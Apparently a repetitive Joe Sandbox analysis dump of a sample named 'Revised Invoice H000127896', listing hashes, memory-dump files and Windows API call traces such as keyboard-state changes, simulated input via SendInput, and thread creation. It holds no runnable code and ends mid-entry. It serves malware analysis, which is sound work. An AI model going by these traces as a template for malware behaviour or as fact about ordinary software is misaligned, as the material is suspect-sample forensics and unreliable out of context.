                              • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                              • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                              • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                              • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                              APIs
                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Window$Enable$Show$MessageMoveSend
                              • String ID:
                              • API String ID: 896007046-0
                              • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                              • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                              • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                              • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                              APIs
                              • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                              • GetFocus.USER32 ref: 00448ACF
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Window$Enable$Show$FocusMessageSend
                              • String ID:
                              • API String ID: 3429747543-0
                              • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                              • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                              • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                              • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                              • __swprintf.LIBCMT ref: 0045D4E9
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ErrorMode$InformationVolume__swprintf
                              • String ID: %lu$\VH
                              • API String ID: 3164766367-2432546070
                              • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                              • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                              • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                              • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                              APIs
                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                              • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                              • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: Msctls_Progress32
                              • API String ID: 3850602802-3636473452
                              • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                              • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                              • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                              • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                              APIs
                              • _malloc.LIBCMT ref: 0041F707
                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                              • _free.LIBCMT ref: 0041F71A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: AllocateHeap_free_malloc
                              • String ID: [B
                              • API String ID: 1020059152-632041663
                              • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                              • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                              • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                              • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                              • __calloc_crt.LIBCMT ref: 00413DB0
                              • __getptd.LIBCMT ref: 00413DBD
                              • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                              • _free.LIBCMT ref: 00413E07
                              • __dosmaperr.LIBCMT ref: 00413E12
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                              • String ID:
                              • API String ID: 155776804-0
                              • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                              • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                              • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                              • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                              APIs
                                • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                              • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                              • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                              • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                              • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                              • String ID:
                              • API String ID: 1957940570-0
                              • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                              • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                              • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                              • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                              • ExitThread.KERNEL32 ref: 00413D4E
                              • GetCurrentThreadId.KERNEL32 ref: 00413D54
                              • __freefls@4.LIBCMT ref: 00413D74
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                              • String ID:
                              • API String ID: 259663610-0
                              • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                              • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                              • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                              • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                              APIs
                              • GetClientRect.USER32(?,?), ref: 004302E6
                              • GetWindowRect.USER32(00000000,?), ref: 00430316
                              • GetClientRect.USER32(?,?), ref: 00430364
                              • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                              • GetWindowRect.USER32(?,?), ref: 004303C3
                              • ScreenToClient.USER32(?,?), ref: 004303EC
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Rect$Client$Window$MetricsScreenSystem
                              • String ID:
                              • API String ID: 3220332590-0
                              • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                              • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                              • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                              • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _malloc_wcslen$_strcat_wcscpy
                              • String ID:
                              • API String ID: 1612042205-0
                              • Opcode ID: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                              • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                              • Opcode Fuzzy Hash: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                              • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memmove_strncmp
                              • String ID: >$U$\
                              • API String ID: 2666721431-237099441
                              • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                              • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                              • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                              • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                              APIs
                              • GetKeyboardState.USER32(?), ref: 0044C570
                              • SetKeyboardState.USER32(00000080), ref: 0044C594
                              • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                              • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                              • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                              • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessagePost$KeyboardState$InputSend
                              • String ID:
                              • API String ID: 2221674350-0
                              • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                              • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                              • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                              • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _wcscpy$_wcscat
                              • String ID:
                              • API String ID: 2037614760-0
                              • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                              • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                              • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                              • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                              APIs
                              • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                              • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                              • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                              • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                              • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                              • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Variant$Copy$AllocClearErrorLastString
                              • String ID:
                              • API String ID: 960795272-0
                              • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                              • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                              • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                              • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                              APIs
                              • BeginPaint.USER32(00000000,?), ref: 00447BDF
                              • GetWindowRect.USER32(?,?), ref: 00447C5D
                              • ScreenToClient.USER32(?,?), ref: 00447C7B
                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                              • EndPaint.USER32(?,?), ref: 00447D13
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                              • String ID:
                              • API String ID: 4189319755-0
                              • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
